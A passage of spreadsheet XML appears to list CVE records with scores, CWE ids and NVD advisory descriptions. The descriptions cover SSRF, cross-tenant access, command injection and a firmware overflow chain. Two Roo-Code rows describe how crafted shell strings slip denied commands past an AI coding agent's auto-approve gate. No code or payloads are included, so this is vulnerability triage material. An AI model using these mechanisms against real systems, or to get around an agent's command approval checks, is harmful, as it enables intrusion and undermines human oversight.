      </c>
      <c r="G2404" s="5" t="inlineStr"/>
      <c r="H2404" s="5" t="inlineStr"/>
      <c r="I2404" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2404" s="5" t="inlineStr"/>
      <c r="K2404" s="5" t="inlineStr">
        <is>
          <t>CWE-602</t>
        </is>
      </c>
      <c r="L2404" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the clusterclaims-controller component of multicluster engine (MCE). A tenant with standard permissions to create and delete ClusterClaim resources can exploit this by manipulating the `spec.namespace` field. This allows the tenant to specify and delete any ManagedCluster, including the hub's local-cluster or other tenants' clusters, due to a missing ownership check. This vulnerability can lead to a denial of service by enabling unauthorized deletion of ManagedClusters.</t>
        </is>
      </c>
      <c r="M2404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73267</t>
        </is>
      </c>
    </row>
    <row r="2405">
      <c r="A2405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73315</t>
        </is>
      </c>
      <c r="C2405" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2405" s="5" t="inlineStr"/>
      <c r="F2405" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2405" s="5" t="inlineStr"/>
      <c r="H2405" s="5" t="inlineStr"/>
      <c r="I2405" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2405" s="5" t="inlineStr"/>
      <c r="K2405" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2405" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a server-side request forgery vulnerability in the PayPal REST webhook handler that allows unauthenticated attackers to cause the server to make outbound HTTP requests to arbitrary destinations by supplying a crafted certificate URL in webhook headers without scheme, hostname, or allowlist validation. Attackers can submit a crafted POST to the PayPal webhook callback endpoint to reach internal network resources including cloud instance metadata services, potentially disclosing IAM credentials or enabling secondary internal service exploitation.</t>
        </is>
      </c>
      <c r="M2405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73315</t>
        </is>
      </c>
    </row>
    <row r="2406">
      <c r="A2406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73626</t>
        </is>
      </c>
      <c r="C2406" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2406" s="5" t="inlineStr"/>
      <c r="F2406" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2406" s="5" t="inlineStr"/>
      <c r="H2406" s="5" t="inlineStr"/>
      <c r="I2406" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2406" s="5" t="inlineStr"/>
      <c r="K2406" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2406" s="5" t="inlineStr">
        <is>
          <t>JupyterLab versions &gt;=4.6.0,&lt;=4.6.1 and &lt;=4.5.9 contain an allowlist/blocklist enforcement gap in PyPIExtensionManager.install(). A missing 'await' caused the is_install_allowed coroutine to never execute, so the extension allowlist/blocklist check was not enforced for direct callers of install(). The stock JupyterLab HTTP API and Extension Manager UI are not affected, as they perform a separate, correctly awaited check. The issue affects only deployments where a custom extension or downstream integration imports PyPIExtensionManager and calls install() directly with a package name influenced by untrusted input, an allowlist/blocklist is configured, the PyPI Extension Manager is enabled, and kernels and terminals are disabled or delegated to remote hosts. Fixed in JupyterLab 4.6.2 and 4.5.10.</t>
        </is>
      </c>
      <c r="M2406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73626</t>
        </is>
      </c>
    </row>
    <row r="2407">
      <c r="A2407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75033</t>
        </is>
      </c>
      <c r="C2407" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2407" s="5" t="inlineStr"/>
      <c r="F2407" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2407" s="5" t="inlineStr"/>
      <c r="H2407" s="5" t="inlineStr"/>
      <c r="I2407" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2407" s="5" t="inlineStr"/>
      <c r="K2407" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2407" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Rancher Manager. Project Secrets were propagated into a namespace based only on its `field.cattle.io/projectId` annotation, without verifying that the referenced project belonged to the same downstream cluster. A user able to create namespaces on one cluster could set the annotation to a project ID from another cluster and have that project's secrets copied into a namespace under their control.
This issue affects Rancher: before 2.15.1.</t>
        </is>
      </c>
      <c r="M2407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75033</t>
        </is>
      </c>
    </row>
    <row r="2408">
      <c r="A2408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75569</t>
        </is>
      </c>
      <c r="C2408" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2408" s="5" t="inlineStr"/>
      <c r="F2408" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2408" s="5" t="inlineStr"/>
      <c r="H2408" s="5" t="inlineStr"/>
      <c r="I2408" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2408" s="5" t="inlineStr"/>
      <c r="K2408" s="5" t="inlineStr">
        <is>
          <t>CWE-1357</t>
        </is>
      </c>
      <c r="L2408" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in mce-operator-bundle. The build process fetches and executes scripts from a remote repository without performing integrity checks, such as commit pinning or signature verification. This allows a malicious actor with write access to the remote repository to inject and execute arbitrary code during the build. The consequence is a compromised build process, potentially leading to the distribution of malicious software.</t>
        </is>
      </c>
      <c r="M2408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75569</t>
        </is>
      </c>
    </row>
    <row r="2409">
      <c r="A2409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76640</t>
        </is>
      </c>
      <c r="C2409" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2409" s="5" t="inlineStr"/>
      <c r="F2409" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2409" s="5" t="inlineStr"/>
      <c r="H2409" s="5" t="inlineStr"/>
      <c r="I2409" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2409" s="5" t="inlineStr"/>
      <c r="K2409" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-787</t>
        </is>
      </c>
      <c r="L2409" s="5" t="inlineStr">
        <is>
          <t>Unitree G1 EDU firmware through 1.5.2 contains multiple chained vulnerabilities in the BLE GATT server and WiFi provisioning stack that allow unauthenticated proximate attackers to achieve root code execution without pairing or credentials by exploiting an unquoted heredoc variable in the WiFi provisioning script and a buffer overflow in the SSID chunk accumulator. Attackers can send crafted BLE writes to overflow a fixed BSS buffer across BLE connections, corrupting an adjacent mainloop function pointer dispatch entry that is subsequently invoked by the cleanup path passing attacker-controlled data to system() as uid 0.</t>
        </is>
      </c>
      <c r="M2409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76640</t>
        </is>
      </c>
    </row>
    <row r="2410">
      <c r="A2410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76851</t>
        </is>
      </c>
      <c r="C2410" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2410" s="5" t="inlineStr"/>
      <c r="F2410" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2410" s="5" t="inlineStr"/>
      <c r="H2410" s="5" t="inlineStr">
        <is>
          <t>github:enterprise_server</t>
        </is>
      </c>
      <c r="I2410" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2410" s="5" t="inlineStr"/>
      <c r="K2410" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2410" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability was identified in GitHub Enterprise Server that allowed remote code execution on the instance. Insufficient network isolation allowed malicious pre-receive hook code to impersonate an internal service and redirect trusted internal requests to a privileged service, leading to elevated code execution. Exploitation required pre-receive hook networking to be enabled and either site administrator privileges or write access to a repository containing a configured pre-receive hook. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.17.20, 3.18.14, 3.19.11, 3.20.7, and 3.21.5. This vulnerability was reported via the GitHub Bug Bounty program.</t>
        </is>
      </c>
      <c r="M2410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76851</t>
        </is>
      </c>
    </row>
    <row r="2411">
      <c r="A2411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77106</t>
        </is>
      </c>
      <c r="C2411" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2411" s="5" t="inlineStr"/>
      <c r="F2411" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2411" s="5" t="inlineStr"/>
      <c r="H2411" s="5" t="inlineStr"/>
      <c r="I2411" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2411" s="5" t="inlineStr"/>
      <c r="K2411" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2411" s="5" t="inlineStr">
        <is>
          <t>Cvlaunchd contained a missing authorization issue affecting command execution authorization. Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t>
        </is>
      </c>
      <c r="M2411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77106</t>
        </is>
      </c>
    </row>
    <row r="2412">
      <c r="A2412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77646</t>
        </is>
      </c>
      <c r="C2412" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2412" s="5" t="inlineStr"/>
      <c r="F2412" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2412" s="5" t="inlineStr"/>
      <c r="H2412" s="5" t="inlineStr"/>
      <c r="I2412" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J2412" s="5" t="inlineStr"/>
      <c r="K2412" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-918</t>
        </is>
      </c>
      <c r="L2412" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability has been reported in PTC Windchill PDMLink and PTC FlexPLM. The vulnerability may be exploited through the deserialization of untrusted data.</t>
        </is>
      </c>
      <c r="M2412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77646</t>
        </is>
      </c>
    </row>
    <row r="2413">
      <c r="A2413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77775</t>
        </is>
      </c>
      <c r="C2413" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2413" s="5" t="inlineStr"/>
      <c r="F2413" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2413" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2413" s="5" t="inlineStr"/>
      <c r="I2413" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2413" s="5" t="inlineStr"/>
      <c r="K2413" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2413" s="5" t="inlineStr">
        <is>
          <t>Headroom's LLM proxy lets a client choose the upstream destination with the x-headroom-base-url request header. _resolve_openai_upstream_base in headroom/proxy/handlers/openai.py accepts the header value, requires only that it parse with an http or https scheme and a hostname, and returns it for use as the upstream base; _select_passthrough_base_url in headroom/providers/proxy_routes.py reads the same header for the passthrough routes. No check rejects loopback, link-local, or RFC 1918 destinations, and because the component is a proxy the upstream response is returned to the caller, so the request reaches internal services and cloud metadata addresses and their responses are disclosed. The Authorization header accompanying the request is forwarded unchanged to the caller-designated host. The pip console script binds 127.0.0.1 by default, but the reference docker-compose.yml ships --host 0.0.0.0 with published ports and no required HEADROOM_PROXY_TOKEN, which the server itself warns about at startup, so a deployment following the shipped compose exposes the affected data-plane routes to the network without authentication.</t>
        </is>
      </c>
      <c r="M2413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77775</t>
        </is>
      </c>
    </row>
    <row r="2414">
      <c r="A2414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77909</t>
        </is>
      </c>
      <c r="C2414" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2414" s="5" t="inlineStr"/>
      <c r="F2414" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2414" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H2414" s="5" t="inlineStr"/>
      <c r="I2414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2414" s="5" t="inlineStr"/>
      <c r="K2414" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L2414" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials in Azure CycleCloud allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77909</t>
        </is>
      </c>
    </row>
    <row r="2415">
      <c r="A2415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78623</t>
        </is>
      </c>
      <c r="C2415" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2415" s="5" t="inlineStr"/>
      <c r="F2415" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2415" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H2415" s="5" t="inlineStr"/>
      <c r="I2415" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2415" s="5" t="inlineStr"/>
      <c r="K2415" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2415" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M2415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t>
        </is>
      </c>
    </row>
    <row r="2416">
      <c r="A2416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79637</t>
        </is>
      </c>
      <c r="C2416" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2416" s="5" t="inlineStr"/>
      <c r="F2416" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2416" s="5" t="inlineStr"/>
      <c r="H2416" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2416" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2416" s="5" t="inlineStr"/>
      <c r="K2416" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2416"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2416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79637</t>
        </is>
      </c>
    </row>
    <row r="2417">
      <c r="A2417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79750</t>
        </is>
      </c>
      <c r="C2417" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2417" s="5" t="inlineStr"/>
      <c r="F2417" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2417" s="5" t="inlineStr"/>
      <c r="H2417" s="5" t="inlineStr"/>
      <c r="I2417" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2417" s="5" t="inlineStr"/>
      <c r="K2417" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2417" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.30, MCPHub scopes non-admin users to servers they own (list views and config edits enforce ownership), but the tool-execution API does not. Any authenticated non-admin user can invoke tools on MCP servers owned by other users — servers they cannot even see in GET /api/servers. Because connected MCP servers carry real capability (filesystem, HTTP fetch, cloud APIs with the owner's keys), this is cross-tenant compromise: demonstrated arbitrary host file read (/etc/passwd, another user's secrets) and SSRF. This issue has been patched in version 1.0.30.</t>
        </is>
      </c>
      <c r="M2417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79750</t>
        </is>
      </c>
    </row>
    <row r="2418">
      <c r="A2418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80134</t>
        </is>
      </c>
      <c r="C2418" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2418" s="5" t="inlineStr"/>
      <c r="F2418" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2418" s="5" t="inlineStr"/>
      <c r="H2418" s="5" t="inlineStr"/>
      <c r="I2418" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2418" s="5" t="inlineStr"/>
      <c r="K2418" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L2418" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Credentials vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M2418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80134</t>
        </is>
      </c>
    </row>
    <row r="2419">
      <c r="A2419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81210</t>
        </is>
      </c>
      <c r="C2419" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2419" s="5" t="inlineStr"/>
      <c r="F2419" s="5" t="inlineStr"/>
      <c r="G2419" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2419" s="5" t="inlineStr"/>
      <c r="I2419" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2419" s="5" t="inlineStr"/>
      <c r="K2419" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2419"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M2419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81210</t>
        </is>
      </c>
    </row>
    <row r="2420">
      <c r="A2420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81832</t>
        </is>
      </c>
      <c r="C2420" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2420" s="5" t="inlineStr"/>
      <c r="F2420" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2420" s="5" t="inlineStr">
        <is>
          <t>ibm, sap</t>
        </is>
      </c>
      <c r="H2420" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I2420" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2420" s="5" t="inlineStr"/>
      <c r="K2420" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L2420" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 SAP Adapter is vulnerable to an XML external entity (XXE) attack.</t>
        </is>
      </c>
      <c r="M2420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81832</t>
        </is>
      </c>
    </row>
    <row r="2421">
      <c r="A2421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82536</t>
        </is>
      </c>
      <c r="C2421" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2421" s="5" t="inlineStr"/>
      <c r="F2421" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2421" s="5" t="inlineStr"/>
      <c r="H2421" s="5" t="inlineStr"/>
      <c r="I2421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2421" s="5" t="inlineStr"/>
      <c r="K2421" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L2421" s="5" t="inlineStr">
        <is>
          <t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability in the shell command parsing logic that allows attackers to execute denied shell commands by exploiting the omission of the bash pipe operator from the command parser's operator token set. Attackers can craft a command line with an allowlisted prefix followed by the stderr-redirecting pipe operator and a denied command, causing the parser to approve the full pipeline while bash executes the denied component with the agent's auto-execute privileges on the developer's machine.</t>
        </is>
      </c>
      <c r="M2421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82536</t>
        </is>
      </c>
    </row>
    <row r="2422">
      <c r="A2422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82537</t>
        </is>
      </c>
      <c r="C2422" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2422" s="5" t="inlineStr"/>
      <c r="F2422" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2422" s="5" t="inlineStr"/>
      <c r="H2422" s="5" t="inlineStr"/>
      <c r="I2422" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2422" s="5" t="inlineStr"/>
      <c r="K2422" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L2422" s="5" t="inlineStr">
        <is>
          <t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability that allows attackers to execute denied shell commands by exploiting a word-boundary mismatch in comment handling between the approval gate's shell parser and bash. Attackers can craft a command string with an allowlisted word immediately followed by a hash character, separator, and denied command to pass the approval gate while bash executes the denied command with the agent's auto-execute privileges on the developer's machine.</t>
        </is>
      </c>
      <c r="M2422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82537</t>
        </is>
      </c>
    </row>
    <row r="2423">
      <c r="A2423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84256</t>
        </is>
      </c>
      <c r="C2423" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2423" s="5" t="inlineStr"/>
      <c r="F2423" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2423" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2423" s="5" t="inlineStr"/>
      <c r="I2423" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2423" s="5" t="inlineStr"/>
      <c r="K2423" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="L2423" s="5" t="inlineStr">
        <is>
          <t>An argument parsing issue in OpenVPN 2.1_rc10 through 2.6.22 and 2.7_alpha1 through 2.7.6 on Windows allows remote authenticated users to execute arbitrary commands via a crafted certificate subject</t>
        </is>
      </c>
      <c r="M2423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84256</t>
        </is>
      </c>
    </row>
    <row r="2424">
      <c r="A2424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84361</t>
        </is>
      </c>
      <c r="C2424" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2424" s="5" t="inlineStr"/>
      <c r="F2424" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2424" s="5" t="inlineStr"/>
      <c r="H2424" s="5" t="inlineStr"/>
      <c r="I2424" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2424" s="5" t="inlineStr"/>
      <c r="K2424" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2424" s="5" t="inlineStr">
        <is>
          <t>Composer is a dependency Manager for the PHP language. From 1.0 until 2.2.30 and 2.10.3, a malicious dependency package from a custom Composer repository or an untrusted composer.lock file could set source.type to perforce and source.url to an rsh: or jsh: P4PORT value. When the Perforce p4 client was installed and Composer installed the package from source through composer install or composer update, including --prefer-source, Composer\Util\Perforce passed the address to p4 without validation, causing p4 to run a local command with the privileges of the user or CI account. Packagist.org does not permit Perforce source metadata. This issue is fixed in versions 2.2.30 and 2.10.3.</t>
        </is>
      </c>
      <c r="M2424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84361</t>
        </is>
      </c>
    </row>
    <row r="2425">
      <c r="A2425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85168</t>
        </is>
      </c>
      <c r="C2425" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2425" s="5" t="inlineStr"/>
      <c r="F2425" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2425" s="5" t="inlineStr"/>
      <c r="H2425" s="5" t="inlineStr"/>
      <c r="I2425" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
